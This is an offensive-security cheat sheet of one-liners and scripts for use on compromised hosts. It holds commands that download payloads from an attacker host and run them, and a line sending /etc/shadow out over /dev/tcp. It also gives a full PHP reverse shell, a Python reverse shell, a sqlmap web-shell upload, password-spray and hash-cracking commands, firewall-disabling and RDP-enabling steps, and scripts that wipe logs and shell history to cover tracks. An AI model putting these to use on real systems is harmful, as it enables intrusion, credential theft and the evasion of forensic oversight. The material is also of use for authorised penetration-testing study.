One-Liners and Dirty Scripts
They don't have to be elegant, they just have to get the job done.
If I use it and it's not here, it's probably over here: https://github.com/burmat/burmatscripts

FILE TRANSFERS

Python HTTP File Download

If you have remote command execution on a box with python - something like this should do the trick:
python -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/meterpreter', '/tmp/meterpreter');"
or if it is a Windows box, it's not much different:
C:\Python2.7\python.exe -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/rs_powershell.exe', '/temp/rs_powershell.exe');"

VBS HTTP File Download

I got stuck with a borked up reverse shell on a Windows system with no file transfer methods and no modern scripting options. I scraped together the following one-liner to dump into my shell to get my payload over by writing a VBS script with echo statements to issue the download:
echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "http://<attacker ip>/meterpreter.exe", 0:o.send^(^):If o.Status=200 Then > "C:\temp\download.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0:If f.Fileexists^("C:\temp\meterpreter.exe"^) Then f.DeleteFile "C:\temp\meterpreter.exe" >> "C:\temp\download.vbs" &echo a.SaveToFile "C:\temp\meterpreter.exe" >>"C:\temp\download.vbs" &echo End if >>"C:\temp\download.vbs" &cscript //B "C:\temp\download.vbs" &del /F /Q "C:\temp\download.vbs"

Impacket's smbserver.py

As always, the impacket suite shines. Use smbserver.py to open an SMB server on your host for file exfiltration:
1
./smbserver.py burmat_exfil ./loot -username burmat -password burmat
2
3
## from the target:
4
PS C:\> net use Q: \\10.1.1.123\burmat_exfil /user:burmat burmat
5
PS C:\> mv .\bh.zip Q:\bh.zip
6
PS C:\> net use Q: /delete
Copied!

PERL HTTP File Download

perl -e 'use File::Fetch; my $ff=File::Fetch->new(uri => "http://10.10.10.11/exploit.sh"); my $file = $ff->fetch() or die $ff->error;'

NGINX + PUT

Picked up from here (thanks @ippsec), you can start a nginx server that can accept PUT requests for file transfer via HTTP:
1
[email protected]:~ ❯ cat /etc/nginx/sites-enabled/file_upload
2
server {
3
listen 8001 default_server;
4
server_name burmat.co;
5
location / {
6
root /var/www/upload/;
7
dav_methods PUT;
8
}
9
}
10
11
[email protected]:~ ❯ service nginx start
Copied!
Issue a PUT request from a remote system to upload files to /var/www/upload on your system:
1
## CURL:
2
[email protected]:~ ❯ curl -X PUT http://192.168.1.87:8001/l00t.txt -F "[email protected]/home/user/l00t.txt"
3
4
## POWERSHELL
5
PS C:\Users\victim> Invoke-RestMethod -Method PUT -Uri "http://10.10.14.12:8001/l00t.txt" -Body $(Get-Content l00t.txt)
Copied!

Netcat File Transfer

Because if Netcat is on the system, everything becomes easier:
1
listener#> nc -l -p 4444 > output.file
2
sender#> nc -w 3 [destination] 4444 < input.file
Copied!
(and if it's not - go get it: C:\Users\burmat>tftp -i 10.10.10.10 get nc.exe)

CERTUTIL Transfer

Using certutil.exe is a clever way to get files down to a victim if you are attacking a Windows box and limited on methods:
1
certutil.exe -urlcache -split -f http://10.10.15.11/burmat.exe C:\temp\burmat.exe
Copied!
You can also write a file from Base64 encoded text, too:
1
certutil.exe -decode C:\temp\payload.txt C:\temp\payload.dll
2
regsvr32 /s /u C:\temp\payload.dll
Copied!

SQLMAP - User w/ FILE Privileges

If you have SQLi with a user account that has FILE privileges, you can use sqlmap to transfer the file to disk without formulating an INFO FILE query yourself:
1
[email protected]:~ ❯ sqlmap -r inject.req --dbms "mysql" --file-write shell.php --file-dest \\inetpub\\wwwroot\\shell.php
Copied!
To see if you have the privilege, attempt (you might not have rights) to dump the user table:
1
[email protected]:~ ❯ sqlmap -r inj.req --dbms "mysql" -D mysql -T user -C User,File_Priv --dump
2
.. SNIP ..
3
[2 entries]
4
+---------+-----------+
5
| User | File_Priv |
6
+---------+-----------+
7
| burmat | Y |
8
| root | Y |
9
+---------+-----------+
Copied!

XML File Creation on Target (via copy/paste)

This is a clever way to get XML over to the system using copy and paste, and writing that XML to file:
1
PS C:\> $console = [XML] @"
2
<XML CODE CODE HERE>
3
"@
4
5
# write the xml to file:
6
PS C:\> $console.save("C:\users\burmat\documents\console.xml")
Copied!

Base64

Using netcat

1
# receiving host
2
nc -lp 4443 | base64 -d > loot.txt
3
4
# sender host
5
base64 /etc/shadow > /dev/tcp/10.10.10.123/4443
Copied!

Copy and Paste

1
## encode from file with:
2
base64 <<< $(cat shell.py) | tr -d "\n"
3
4
## decode to file with:
5
echo -n "ZmlsZSBjb250ZW50IGhlcmUK" | base64 -d > shell.py
Copied!

xclip

Not a true method of file transfer, but useful nonetheless:
cat /usr/share/nishang/Client/Out-HTA.ps1 | xclip -sel clip

REVERSE SHELLS / SHELLS

PHP Reverse Shell - Minified

<?php set_time_limit (0); $VERSION = "1.0"; $ip = "10.10.10.10"; $port = 8080; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { exit(1); } $daemon = 1; } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (1) { if (feof($sock)) { break; } if (feof($pipes[1])) { break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?>

Python Reverse Shell for Windows

1
import os,socket,subprocess,threading;
2
3
def s2p(s, p):
4
while True:
5
data = s.recv(1024)
6
if len(data) > 0:
7
p.stdin.write(data)
8
9
def p2s(s, p):
10
while True:
11
s.send(p.stdout.read(1))
12
13
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
14
s.connect(("10.11.0.37",4444))
15
16
p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
17
18
s2p_thread = threading.Thread(target=s2p, args=[s, p])
19
s2p_thread.daemon = True
20
s2p_thread.start()
21
22
p2s_thread = threading.Thread(target=p2s, args=[s, p])
23
p2s_thread.daemon = True
24
p2s_thread.start()
25
26
try:
27
p.wait()
28
except KeyboardInterrupt:
29
s.close()
Copied!

WinRM Ruby Shell

1
require 'winrm'
2
3
conn = WinRM::Connection.new(
4
endpoint: 'https://IP:PORT/wsman',
5
transport: :ssl,
6
user: 'username',
7
password: 'password',
8
:no_ssl_peer_verification => true
9
)
10
11
command=""
12
13
conn.shell(:powershell) do |shell|
14
until command == "exit\n" do
15
print "PS > "
16
command = gets
17
output = shell.run(command) do |stdout, stderr|
18
STDOUT.print stdout
19
STDERR.print stderr
20
end
21
end
22
puts "Exiting with code #{output.exitcode}"
23
end
Copied!
(originally sourced from: https://github.com/WinRb/WinRM)

ENUMERATION

Finding Vulnerable Applications (Linux)

This one is pretty dirty, and pretty awesome. Run a one-liner on your victim to generate a list of packages (rpm or dpkg) on the machine (/tmp/packages.txt). Copy this file to one that has searchsploit, and run the script.
Generate the file with: FILE="packages.txt"; FILEPATH="/tmp/$FILE"; /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; if [ $? -eq 0 ]; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; else dpkg -l | grep ii | awk '{print $2 " " substr($3,1)}' > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; fi; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo "";
(Example Output from my Kali VM)
(thanks to chryzsh for doing the heavy lifting)

"Proc Mon" (IppSec) Script

One of the handiest scripts to find running jobs and processes in real time. Thanks to IppSec for sharing it with the world:
1
#!/bin/bash
2
3
IFS=$'\n'
4
old_process=$(ps -eo command)
5
6
while true; do
7
new_process=$(ps -eo command)
8
diff <(echo "$old_process") <(echo "$new_process") |grep [\<\>]
9
sleep 1
10
old_process=$new_process
11
done
Copied!

SNMP Walker

I don't remember where I got this, but incredibly useful to focus in on key info from an snmpwalk prior to sifting through all of it:
1
#!/bin/bash
2
for ip in $(cat ~/Documents/labs/targets.txt | awk '/^[0-9]/ {print $1}'); do
3
4
echo "Performing snmpwalk on public tree for" $ip " - Checking for System Processes"
5
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.1.6.0 > ~/Documents/labs/$ip/scans/systemprocesses.txt
6
7
echo "Performing snmpwalk on public tree for" $ip " - Checking for Running Programs"
8
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 > ~/Documents/labs/$ip/scans/runningprograms.txt
9
10
echo "Performing snmpwalk on public tree for" $ip " - Checking for Processes Path"
11
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.4 > ~/Documents/labs/$ip/scans/processespath.txt
12
13
echo "Performing snmpwalk on public tree for" $ip " - Checking for Storage Units"
14
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.2.3.1.4 > ~/Documents/labs/$ip/scans/storageunits.txt
15
16
echo "Performing snmpwalk on public tree for" $ip " - Checking for Software Name"
17
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.6.3.1.2 > ~/Documents/labs/$ip/scans/softwarename.txt
18
19
echo "Performing snmpwalk on public tree for" $ip " - Checking for User Accouints"
20
snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 > ~/Documents/labs/$ip/scans/useraccounts.txt
21
22
echo "Performing snmpwalk on public tree for" $ip " - Checking for TCP Local Ports"
23
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.6.13.1.3 > ~/Documents/labs/$ip/scans/tcplocalports.txt
24
25
echo "Performing snmp-check scan for" $ip
26
snmp-check $ip > ~/Documents/labs/$ip/scans/snmpcheck.txt
27
28
echo "Cleaning up empty files..."
29
find ~/Documents/labs/$ip/scans/ -size 0 -print0 |xargs -0 rm
30
done
Copied!

Ping Scan

Linux Ping Scanning:

You can use a regular-old for loop:
for i in {1..254}; do ping -c 1 -W 1 172.1.1.$i | grep 'from'; done
Or you can try out the following python script:
1
#!/usr/bin/python
2
import multiprocessing, subprocess, os
3
def pinger( job_q, results_q ):
4
DEVNULL = open(os.devnull,'w')
5
while True:
6
ip = job_q.get()
7
if ip is None: break
8
try:
9
subprocess.check_call(['ping','-c1',ip],stdout=DEVNULL)
10
results_q.put(ip)
11
except:
12
pass
13
14
if __name__ == '__main__':
15
pool_size = 255
16
jobs = multiprocessing.Queue()
17
results = multiprocessing.Queue()
18
pool = [ multiprocessing.Process(target=pinger, args=(jobs,results)) for i in range(pool_size) ]
19
for p in pool:
20
p.start()
21
22
for i in range(1,255):
23
jobs.put('10.120.15.{0}'.format(i))
24
25
for p in pool:
26
jobs.put(None)
27
28
for p in pool:
29
p.join()
30
31
while not results.empty():
32
ip = results.get()
33
print(ip)
Copied!

Windows Ping Scan:

Not the fastest or the cleanest, but it's an easy way to generate a ping scan from a cmd prompt:
FOR /L %i IN (1,1,254) DO ping -n 1 192.168.1.%i | FIND /i "Reply" >> ips.txt

REMOTE DESKTOP (ENABLE / ADD)

Enable RDP:

1
PS > Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
2
PS > Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
3
PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Copied!
If you need to add your user to the group, you can use: NET LOCALGROUP "Remote Desktop Users" domain\user /ADD. And if you need to disable the firewall altogether: NetSh Advfirewall set allprofiles state off

CRACKING

Password Spray List

Use exrex [https://github.com/asciimoo/exrex] to generate a custom wordlists to password spray with:
1
python exrex.py "(Spring|Winter|Autumn|Fall|Summer|Winter)(20)1[78]!"
Copied!

Small Wordlist, Rules

I got hit with having to crack mscachev2 hashes which can be slow. This is a perfect time to instead try targeted (small) wordlists and instead pass in some tried-and-tested rules: hashcat64.exe -a 0 -m 2100 -r rules/d3adhob0.rule mscachev2hash.txt wordlist.txt -o cracked.txt

SYSTEM CLEANUP

Purge Linux Logs

1
#!/bin/sh
2
3
/etc/init.d/sysklogd stop
4
VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp"
5
cd /var/log
6
for ii in $VARLOGS; do
7
echo -n > $ii
8
rm -f $ii.? $ii.?.gz
9
done
10
11
/etc/init.d/samba stop
12
rm -f /var/log/samba/*
13
14
rm -f /var/lib/dhcp3/*
15
16
for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; do
17
echo -n > $ii
18
done
Copied!

Covering Your Tracks

1
#!/bin/bash
2
echo "COVERING TRACKS"
3
echo "clearing /var/log/auth.log"
4
echo "" > /var/log/auth.log
5
echo "clearing ~/.bash_history"
6
echo "" > ~/.bash_history
7
echo "clearing /root/.bash_history"
8
echo "" > /root/.bash_history
9
echo "removing ~/.bash_history"
10
rm ~/.bash_history -rf
11
echo "removing /tmp/"
12
rm -R /tmp/*
13
echo "clearing /var/log/messages"
14
echo "" > /var/log/messages
15
echo "clearing command history"
16
history -c
Copied!
Last modified 1yr ago